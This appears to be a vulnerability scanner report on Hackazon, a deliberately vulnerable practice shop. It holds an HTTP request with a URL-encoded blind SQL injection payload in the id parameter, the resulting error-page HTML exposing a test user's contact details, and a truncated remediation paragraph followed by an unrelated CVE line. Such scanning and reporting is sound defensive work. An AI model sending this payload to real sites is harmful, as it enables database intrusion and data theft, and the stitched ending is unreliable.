True Request: GET http://69.164.223.171/category/view?id=%27+RLIKE+%28SELECT+%28CASE+WHEN+%2819%3D19%29+THEN+0x7465787476616c7565+ELSE+0x28+END%29%29--+ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Hackazon — Error: 404 No such category</title>
<script type="text/javascript">
var App = window.App || {};
App.config = {"host":"http:\/\/69.164.223.171","user":{"id":"209","username":"CHSuser","first_name":"John","last_name":"Smith","user_phone":"4085551234","email":"jsmith20@kelev.biz","created_on":"2019-08-05 21:24:27","photo":null,"photoUrl":null},"baseImgPath":"\/user_pictures\/","dataType":"xml"};
</script>
<script src="/js/tools.js"></script>
<script src="/js/site.js"></script>
<script type="text/javascript">
// For version detection, set to min. required Flash Player version, or 0 (or 0.0.0), for no version detection.
var swfVersionStr = "11.1.0";
// To use express install, set to playerProductInstall.swf, otherwise the empty string.
var xiSwfUrlStr = "/swf/playerProductInstall.swf";
var flashvars = {
$(function () {
if ($('#flashBanner').length) {
setTimeout(function () {
swfobject.embedSWF(
"/swf/SliderBanner.swf", "flashBanner",
"360", "290",
swfVersionStr, xiSwfUrlStr,
flashvars, params, attributes);
// JavaScript enabled so display the flashContent div in case it is not replaced with a swf object.
swfobject.createCSS("#flashBanner", "display:block;text-align:left;");
}, 300);
}
});
</script>
</head>
<body class="">
<header class="hw-header">
<nav class="navbar hw-navbar navbar-fixed-top" role="navigation"
</div>
<div class="row error-page">
<div class="col-lg-12">
<p>Please try to change your request.</p>
</div>
</div>
</div> </div>
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
CVE-2017-7679 - mod_mime can read one byte past its buffer when
used in a malicious Content-Type response header.